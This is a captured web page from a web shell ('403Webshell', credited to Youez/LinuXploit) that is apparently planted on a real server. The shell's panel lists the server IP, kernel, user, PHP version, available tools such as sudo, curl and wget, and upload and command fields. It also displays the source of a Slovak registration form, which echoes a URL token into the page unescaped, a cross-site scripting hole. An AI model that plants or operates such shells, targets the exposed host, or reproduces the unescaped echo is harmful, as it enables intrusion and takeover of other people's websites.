403Webshell
Server IP : 37.9.174.138  /  Your IP : 216.73.216.117
Web Server : Apache
System : Linux vps6.backend.sk 6.12.100+deb13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.100-1 (2026-07-30) x86_64
User : ftpuser ( 1001)
PHP Version : 8.4.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/ttjs.cz/dev/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/ttjs.cz/dev/admin/registration.php
<div class="container">           
    <div class="col-md-6 col-md-offset-3">
        <form class="form-signin" method="POST" onsubmit="captchaPrepare($(this).serializeArray(), register);
                return false;">
            <h2 class="form-signin-heading">Registrácia</h2>
            <div class="form-group">
                <label for="inputEmail" class="sr-only">E-mail</label>
                <input type="email" id="inputEmail" class="form-control input-lg" name="email" placeholder="* E-mail" required autofocus>
            </div>

            <div class="form-group">
                <label for="inputFirstName" class="sr-only">Firma</label>
                <input id="inputFirstName" class="form-control input-lg" name="first_name" placeholder="* Meno" required autofocus>
            </div>

            <div class="form-group">
                <label for="inputLastName" class="sr-only">Priezvisko</label>
                <input id="inputLastName" class="form-control input-lg" name="last_name" placeholder="* Priezvisko" required autofocus>
            </div>

            <div class="form-group">
                <label for="inputPassword" class="sr-only">Heslo</label>
                <input type="password" id="inputPassword" class="form-control input-lg" name="password" placeholder="* Heslo" required>  

            </div>
            <div class="form-group">
                <label for="inputPasswordRetype" class="sr-only">Heslo znovu</label>
                <input type="password" id="inputPasswordRetype" class="form-control input-lg" name="password_retype" placeholder="* Heslo znovu" required> 
            </div>

            <?php
            $token = \app\classes\UrlReader::getInstance()->getUrlParam(3);
            if ($token !== false) {
                ?>
                <input type="hidden" name="token" class="form-control" value="<?php echo $token; ?>">
                <?php
            }
            ?>
            <div id='recaptcha' 
                 class="g-recaptcha"
                 data-sitekey="<?php echo GOOGLE_INVISIBLE_RECAPTCHA_SITE_KEY; ?>"
                 data-callback="onRecaptchaResponse"
                 data-size="invisible">
            </div>
            <button class="btn btn-lg btn-primary btn-block" type="submit">Registrovať</button>
        </form>      
    </div>        
</div>

<script src="https://www.google.com/recaptcha/api.js" async defer></script>

Youez - 2016 - github.com/yon3zu
LinuXploit